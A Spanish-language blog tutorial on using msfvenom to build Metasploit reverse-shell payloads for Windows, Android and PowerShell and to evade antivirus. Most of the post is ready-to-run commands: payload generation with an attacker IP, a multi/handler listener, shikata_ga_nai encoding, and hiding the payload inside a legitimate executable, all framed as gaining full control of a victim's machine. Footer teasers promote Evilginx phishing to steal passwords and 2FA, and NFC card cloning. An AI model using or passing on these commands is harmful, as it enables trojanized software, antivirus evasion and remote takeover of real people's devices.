Hacking y Ciberseguridad evadir antivirus con MSFvenom

 

www.onlinetis.com 

Hacking y Ciberseguridad evadir antivirus con MSFvenom

¿Qué es MSFvenom?

MSFvenom es una herramienta de línea de comandos en Kali Linux que se utiliza para generar payloads (cargas útiles) maliciosos. Es una combinación de las herramientas msfpayload y msfencode, simplificando el proceso de creación de exploits.

Usos Principales

Puedes usar MSFvenom para crear varios tipos de payloads, incluyendo:

  • Reverse Shells: El payload se conecta a tu máquina de atacante, dándote control sobre la máquina de la víctima. 🐚

  • Bind Shells: El payload abre un puerto en la máquina de la víctima, esperando una conexión entrante. 🚪

  • Metasploit Payloads: Payloads que aprovechan el framework de Metasploit.

Sintaxis Básica

La sintaxis básica de MSFvenom es:

Bash
msfvenom -p <payload> <opciones> -f <formato> -o <salida>

  • -p <payload>: Define el tipo de payload que vas a usar. Por ejemplo, windows/meterpreter/reverse_tcp.

  • <opciones>: Opciones específicas para el payload. Las más comunes son:

    • LHOST=<IP>: Tu dirección IP local (la de tu máquina atacante).

    • LPORT=<puerto>: El puerto que usarás para escuchar la conexión (ej. 4444).

  • -f <formato>: El formato del archivo de salida. Algunos formatos comunes son exe (ejecutable de Windows), asp (página web), o py (script de Python).

  • -o <salida>: El nombre del archivo de salida donde se guardará el payload.

Ejemplos Prácticos

1. Generar un Reverse Shell para Windows

Este comando crea un ejecutable para Windows que, al ser ejecutado, se conectará a tu dirección IP (192.168.1.100) en el puerto 4444.

Bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

2. Generar un Payload para Android

Para un dispositivo Android, puedes generar un archivo APK. El payload se activará al instalar la aplicación.

Bash
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o app.apk

3. Generar un Payload en Python

Este comando crea un script en Python que puedes incrustar en otro script.

Bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f py -o payload.py

Escuchando la Conexión

Una vez que has generado el payload y la víctima lo ha ejecutado, necesitas una forma de "escuchar" la conexión entrante. Esto se hace con el Metasploit Framework.

  1. Abre la consola de Metasploit escribiendo msfconsole en la terminal.

  2. Usa el exploit que corresponde a tu payload. En este caso, el multi-handler.

    Bash
    use exploit/multi/handler

  3. Configura el payload y las opciones (LHOST y LPORT) para que coincidan con las que usaste en msfvenom.

    Bash
    set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444

  4. Ejecuta el exploit en modo de escucha.

    Bash
    exploit

Ahora, cuando la víctima ejecute el payload.exe, obtendrás una sesión de Meterpreter en tu consola de Metasploit, dándote control total sobre la máquina.

Técnicas de Evasión con MSFvenom

  1. Uso de Codificadores (-e):

    Los codificadores de MSFvenom transforman el payload original para que su firma binaria cambie. Un codificador popular es shikata_ga_nai, que utiliza un algoritmo polimórfico para generar un código único en cada iteración.

    • Comando Básico:

      Bash
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -f exe -o payload_encoded.exe

    • Múltiples Iteraciones (-i):

      Para aumentar la evasión, puedes aplicar el codificador varias veces. Esto hace que el patrón del código sea más difícil de detectar.

      Bash
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o payload_encoded_multiple.exe

  1. Uso de Plantillas (-x) y Firmas de Código (-k):

    Puedes incrustar tu payload malicioso en un archivo ejecutable legítimo, como un programa de Windows inofensivo. El comando -x especifica la ruta a este "portador" (.exe o .dll), y -k mantiene su funcionalidad original. Esto ayuda a evadir la detección basada en firmas, ya que el archivo base es un programa conocido y no malicioso.

    • Comando:

      Bash
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /ruta/a/programa_legitimo.exe -k -f exe -o payload_final.exe

  1. Generación de Payloads en Distintos Formatos (-f):

    Los antivirus están muy enfocados en los archivos .exe de Windows. Generar payloads en otros formatos puede ser una forma de evadir la detección, al menos de manera inicial. Puedes generar scripts en Python (py), PowerShell (psh), o archivos .dll que se inyectan en procesos.

    • Ejemplo para PowerShell:

      Bash
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh-cmd -o payload.ps1

    Este comando crea un script que puede ser ejecutado directamente en la memoria del sistema, evitando que se escriba un archivo malicioso en el disco.

Consideraciones Adicionales

  • AVs Basados en Comportamiento: Los métodos mencionados se centran principalmente en la detección estática (basada en firmas). Sin embargo, los antivirus modernos también usan la detección heurística y de comportamiento, que analiza lo que hace el payload una vez en ejecución (por ejemplo, si intenta conectarse a un servidor externo o modificar archivos críticos del sistema).

  • Herramientas Complementarias: MSFvenom es solo el primer paso. Para una evasión más avanzada, los pentesters a menudo usan herramientas adicionales como Veil-Framework o Obfuscators que aplican técnicas más sofisticadas como la ofuscación de código o la inyección en memoria.

  • Actualización Constante: Los AVs se actualizan constantemente con nuevas firmas y heurísticas. Un payload que evade la detección hoy puede ser detectado mañana. Es una carrera de armamento.

Location: España

Entradas populares de este blog

Ciberseguridad y hacking con Whatweb

Imagen
www.onlinetis.com WhatWeb es una herramienta de código abierto para realizar fingerprinting o huella digital de sitios web . Su principal función es identificar las tecnologías, aplicaciones, servidores y otras configuraciones que se utilizan en una página web. Es muy popular en el ámbito de la ciberseguridad, especialmente en la fase de reconocimiento de una auditoría de seguridad o un test de penetración. ¿Cómo funciona WhatWeb? WhatWeb opera analizando una página web en busca de "firmas" o patrones que revelan la tecnología subyacente. En lugar de ser un escáner de vulnerabilidades completo, se centra en la recopilación de información. Para ello, examina diversos elementos del sitio web, incluyendo: Encabezados HTTP : Analiza las respuestas del servidor para identificar el tipo de servidor web (como Apache o Nginx), el lenguaje de programación (PHP, ASP.NET), o la versión. Código HTML y JavaScript : Busca cadenas de texto, nombres de archivos, comentarios o scripts especí...
LEER MAS »

Como robar contraseñas haciendo un phishing web

Imagen
  www.onlinetis.com Evilginx es una herramienta de phishing de tipo man-in-the-middle (MitM) diseñada para interceptar y robar credenciales de usuario, incluyendo las de sitios web que utilizan autenticación de doble factor (2FA). Su principal objetivo es engañar a las víctimas para que introduzcan sus credenciales en un sitio web falso que parece legítimo. ¿Cómo funciona Evilginx? Evilginx actúa como un proxy inverso. Esto significa que se coloca entre la víctima y el sitio web real que la víctima intenta visitar. Aquí te explicamos los pasos clave de su funcionamiento: Atracción de la víctima : El atacante envía un enlace a la víctima que la dirige al sitio de phishing, el cual está alojado en el servidor donde se ejecuta Evilginx. El dominio de este sitio suele ser muy similar al del sitio web real para no levantar sospechas. Proxy inverso : Cuando la víctima accede al sitio de phishing, Evilginx no solo le presenta una copia idéntica del sitio web real, sino que también red...
LEER MAS »

Arsenal software hacking NFC

Imagen
  www.onlinetis.com Arsenal software hacking NFC Kali Linux incluye varias herramientas especializadas para la auditoría y "hacking" de redes y dispositivos NFC. Estas herramientas están diseñadas para interactuar con las etiquetas y tarjetas NFC para realizar análisis de seguridad, como leer, escribir o clonar datos. Herramientas principales libnfc : Es la biblioteca fundamental que proporciona las funciones básicas para interactuar con dispositivos NFC. Es la base para muchas otras herramientas. Permite listar, leer y escribir en tags NFC. Los comandos más comunes son: nfc-list : Lista los dispositivos y tarjetas NFC conectados. nfc-mfclassic : Utilidad para leer y escribir en tarjetas MIFARE Classic , que son comunes en sistemas de transporte y control de acceso. nfc-mfultralight : Similar al anterior, pero para tarjetas MIFARE Ultralight . mfoc (Mifare Offline Cracker) : Esta es una herramienta crucial para el "hacking" de tarjetas MIFARE Classic. Explota una vu...
LEER MAS »